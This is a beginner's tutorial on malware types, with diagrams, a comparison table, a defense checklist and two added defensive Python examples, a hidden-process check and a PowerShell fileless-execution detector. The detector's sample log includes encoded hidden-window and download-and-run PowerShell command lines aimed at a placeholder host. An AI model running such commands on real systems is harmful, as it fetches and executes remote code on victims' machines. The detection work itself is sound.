Malware and Its Types

Malware is short for malicious software. It is any program or code written with the purpose of causing harm — stealing data, damaging files, disrupting systems, or gaining unauthorized control over a device. Malware is the most common weapon attackers use, and it appears in many different forms.

Each type of malware has a unique way of spreading and a specific goal. A beginner must understand each type clearly to recognize warning signs and take the right defensive steps.

How Malware Enters a System

COMMON ENTRY POINTS FOR MALWARE:

Email Attachment ──────────►┐
Malicious Website ──────────┤
Infected USB Drive ─────────┤──► DEVICE INFECTED
Software Download ──────────┤
Fake Software Update ───────┘

Once inside:
Malware runs silently ──► Steals / Damages / Controls

Type 1: Virus

A computer virus is the oldest and most well-known type of malware. It attaches itself to a legitimate file — like a document or a program. When a user opens that file, the virus code runs. The virus then copies itself into other files on the same system and spreads further whenever those infected files are shared.

How a Virus Works

Step 1: Attacker embeds virus code inside "invoice.pdf"
Step 2: Victim receives and opens "invoice.pdf"
Step 3: Virus code runs automatically
Step 4: Virus copies itself into 5 other files on the device
Step 5: Victim emails one of those files to a colleague
Step 6: Colleague opens it → now their device is infected too

A virus needs a human action — opening a file — to activate and spread. This is what separates a virus from a worm.

Key Characteristics

  • Requires a host file to attach to
  • Needs user action to activate
  • Can corrupt or delete files
  • Spreads when infected files are shared

Type 2: Worm

A worm is similar to a virus but far more dangerous in terms of spread. A worm does not need to attach to a file, and it does not need a user to open anything. It copies itself and moves across a network automatically, exploiting security vulnerabilities in connected systems.

WORM SPREAD ACROSS A NETWORK:

Device A (Infected)
    │
    ├──► Device B (Auto-infected via network)
    │        │
    │        ├──► Device C
    │        └──► Device D
    │
    └──► Device E (Auto-infected via network)
             │
             └──► Device F, G, H...

No user action required. Spread is automatic and rapid.

The WannaCry worm in 2017 infected over 200,000 computers across 150 countries within hours — simply by spreading automatically through unpatched Windows systems.

Type 3: Trojan Horse

A Trojan Horse — or simply Trojan — is malware that disguises itself as a useful, legitimate application. A user willingly downloads and installs it because it looks harmless or helpful. Once installed, the Trojan carries out its real purpose in the background.

TROJAN DISGUISE EXAMPLE:

What user sees:       "Free Video Editor Pro – Download Now!"
What user downloads:  video_editor_pro.exe
                         ├── Actual software (real, works as expected)
                         └── Hidden malware (steals banking passwords)

User installs it → Software works fine → Malware runs silently in background
→ Banking credentials sent to attacker

Unlike a virus or worm, a Trojan does not replicate itself. It relies on the user installing it voluntarily under false pretenses.

Type 4: Ransomware

Ransomware encrypts all files on an infected device, making them completely unreadable. The attacker then displays a message demanding payment — usually in cryptocurrency — to provide the decryption key. If the victim does not pay, the files remain locked permanently.

RANSOMWARE ATTACK SEQUENCE:

Step 1: Victim clicks on infected email attachment
Step 2: Ransomware installs silently
Step 3: Ransomware scans and encrypts ALL files
        Documents, Photos, Databases → all locked
Step 4: Screen displays ransom note:
        "Your files are encrypted. Pay $500 in Bitcoin
         within 48 hours or all files will be deleted."
Step 5: Victim must choose: Pay or lose data

Ransomware caused over $20 billion in global damages in 2021. Hospitals, schools, government agencies, and businesses of all sizes have fallen victim. The best defense is keeping offline backups of all critical data.

Type 5: Spyware

Spyware secretly monitors everything a user does on a device and sends that information to the attacker. It tracks keystrokes, captures screenshots, records browsing history, and steals saved passwords — all without the user knowing.

What Spyware Collects       How It Is Used
Typed keystrokes            Steal passwords and messages
Browser history             Target user with ads or blackmail
Screenshots                 Capture sensitive documents
Webcam/microphone access    Record private conversations
Location data               Track physical movements

A keylogger is a common type of spyware. It records every key pressed on a keyboard. If someone types a bank password, the keylogger captures it and sends it to the attacker.

Type 6: Adware

Adware automatically displays or downloads unwanted advertisements on a device. While adware is less harmful than other types, it slows down the system, creates a poor user experience, and sometimes acts as a gateway for more dangerous malware. Many free applications come bundled with adware hidden inside.

Type 7: Rootkit

A rootkit is one of the stealthiest types of malware. It hides deep inside the operating system — sometimes at the hardware level — and gives the attacker persistent, administrator-level control over the device. Rootkits are designed to be invisible. Standard antivirus tools often cannot detect them because the rootkit hides itself from the operating system's security tools.

ROOTKIT HIDING MECHANISM:

Operating System asks: "Are any malicious programs running?"
Rootkit intercepts the question
Rootkit answers: "No, nothing suspicious here."
Real answer: Rootkit is actively running and hiding itself

Result: Attacker has full control, device appears clean
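One way defenders look for this kind of hiding is a cross-view check: gather the process list the way the operating system normally reports it, gather it again by an independent method, and compare. The following is an added example, not code from the original page; it assumes a Linux host, reads /proc for the normal view and probes task IDs with os.kill(pid, 0) for the second view.

```python
import os

def listed_tasks(proc_root="/proc"):
    """Every process and thread ID the operating system's normal view shows:
    the numeric entries under /proc plus each one's /proc/<pid>/task listing
    (the same source that tools like `ps` rely on)."""
    seen = set()
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        seen.add(int(name))
        try:
            seen.update(int(t) for t in os.listdir(f"{proc_root}/{name}/task"))
        except OSError:
            pass  # the task exited between the two reads
    return seen

def probed_tasks(max_pid=None):
    """A second, independent view: send signal 0 to every candidate ID.
    A task that exists but is hidden from /proc still answers the probe."""
    if max_pid is None:
        with open("/proc/sys/kernel/pid_max") as f:
            max_pid = int(f.read())
    found = set()
    for pid in range(1, max_pid + 1):
        try:
            os.kill(pid, 0)
            found.add(pid)
        except ProcessLookupError:
            continue          # nothing there
        except PermissionError:
            found.add(pid)    # exists, belongs to another user
    return found

def hidden_tasks(listed_before, probed, listed_after):
    """Cross-view difference. A task visible to the probe but absent from BOTH
    listings is a candidate for rootkit hiding; requiring both listings drops
    tasks that merely started or exited while the probe was running."""
    return sorted(probed - (listed_before | listed_after))

def scan():
    before = listed_tasks()
    probed = probed_tasks()
    after = listed_tasks()
    return hidden_tasks(before, probed, after)

if __name__ == "__main__":
    print("hidden task IDs:", scan() or "none")
```

Probing every ID up to pid_max takes several seconds in Python; a rootkit that also hooks the kill system call would defeat this particular second view, which is why real tools compare several independent views.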

Type 8: Botnet and Bot Malware

A botnet is a network of infected computers that an attacker controls remotely. Each infected computer is called a "bot" or "zombie." The attacker — called a bot herder — can command all bots simultaneously to carry out large-scale attacks such as DDoS attacks, spam campaigns, or cryptocurrency mining.

BOTNET STRUCTURE:

Attacker (Bot Herder)
    │
    ├──► Bot 1 (Infected PC, India)
    ├──► Bot 2 (Infected PC, USA)
    ├──► Bot 3 (Infected PC, Germany)
    ├──► Bot 4 (Infected PC, Brazil)
    └──► Bot 5 (Infected PC, Japan)

All bots receive one command: "Attack website X"
Combined traffic from all bots → DDoS attack on website X

The owner of an infected computer usually has no idea their machine is part of a botnet. The device may run slightly slower, but shows no other obvious signs.

Type 9: Fileless Malware

Fileless malware does not install any file on the target device. Instead, it runs directly in the computer's memory (RAM) using legitimate system tools that are already present on the device. Because no file is written to the hard drive, traditional antivirus scans often miss it completely.

FILELESS MALWARE VS TRADITIONAL MALWARE:

Traditional Malware:
Attacker → Installs malware.exe on hard drive → Antivirus scans → Detected

Fileless Malware:
Attacker → Injects code into RAM using built-in Windows tool (PowerShell)
         → Runs entirely in memory → Leaves no file on disk
         → Antivirus has nothing to scan → NOT detected
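Because there is no file to scan, detecting this kind of attack means watching what processes do: which parent started them and what their command line asks for. The following is an added example, not code from the original page; the log format, the sample lines and the rule patterns are all constructed for illustration.

```python
import re

# Constructed process-creation log lines (not real captures). Fields:
# timestamp | parent image | image | command line
SAMPLE_LOG = """\
2024-01-01T10:00:00Z|explorer.exe|notepad.exe|notepad.exe C:\\Users\\a\\notes.txt
2024-01-01T10:00:05Z|winword.exe|powershell.exe|powershell.exe -nop -w hidden -enc QQBCAEMA
2024-01-01T10:00:09Z|cmd.exe|powershell.exe|powershell.exe -File C:\\scripts\\backup.ps1
2024-01-01T10:00:12Z|outlook.exe|powershell.exe|powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')
"""

# Signals that PowerShell is being asked to run code that never touches disk,
# rather than a script file an administrator wrote.
IN_MEMORY_PATTERNS = {
    "encoded command": re.compile(r"-e(nc|ncodedcommand)?\b", re.I),
    "hidden window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "download-and-run": re.compile(r"(iex|invoke-expression).*download", re.I),
    "no profile": re.compile(r"-no(p|profile)\b", re.I),
}
# Office and mail clients do not normally spawn shells; a document-borne
# infection usually does.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}

def score_event(parent, image, cmdline):
    """Return the list of reasons this event looks like in-memory execution."""
    reasons = []
    if image.lower() != "powershell.exe":
        return reasons
    for name, pattern in IN_MEMORY_PATTERNS.items():
        if pattern.search(cmdline):
            reasons.append(name)
    if parent.lower() in OFFICE_PARENTS:
        reasons.append(f"spawned by {parent}")
    return reasons

def detect(log_text):
    """Alert on events with at least two signals; one alone is too common."""
    alerts = []
    for line in log_text.splitlines():
        if not line:
            continue
        ts, parent, image, cmdline = line.split("|", 3)
        reasons = score_event(parent, image, cmdline)
        if len(reasons) >= 2:
            alerts.append((ts, image, reasons))
    return alerts
```

Run against the sample, the second and fourth lines are flagged while the administrator's scheduled backup script on the third line is not.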

Malware Comparison Table

Type         Spreads How?                    Needs User Action?   Main Damage
Virus        Via infected files              Yes                  Corrupts / deletes files
Worm         Automatically via network       No                   Spreads rapidly, overloads networks
Trojan       User installs it voluntarily    Yes                  Backdoor access, credential theft
Ransomware   Email, download                 Yes                  Locks all files, demands ransom
Spyware      Bundled with software           Yes                  Steals personal data silently
Adware       Bundled with free apps          Yes                  Unwanted ads, slows device
Rootkit      Exploit, phishing               Sometimes            Full hidden system control
Botnet       Drive-by download, phishing     Sometimes            Uses device for large attacks
Fileless     Script execution in memory      Sometimes            Undetected persistent access

Malware Defense Checklist

  • Keep software updated – Patches close the vulnerabilities malware exploits to enter.
  • Use reputable antivirus software – Detects and removes known malware from the device.
  • Avoid unknown email attachments – Most malware arrives through email.
  • Download software only from official sources – Eliminates Trojan-laden fake software.
  • Back up data regularly – The only reliable defense against ransomware is a clean backup.
  • Use a firewall – Blocks malware from sending data back to an attacker over the network.
  • Enable behavior-based detection – Catches fileless malware that traditional scans miss.

Understanding malware types is essential before moving on to social engineering — a completely different attack method that does not use malware at all. Instead, social engineering attacks exploit the most unpredictable target in any security system: human beings.
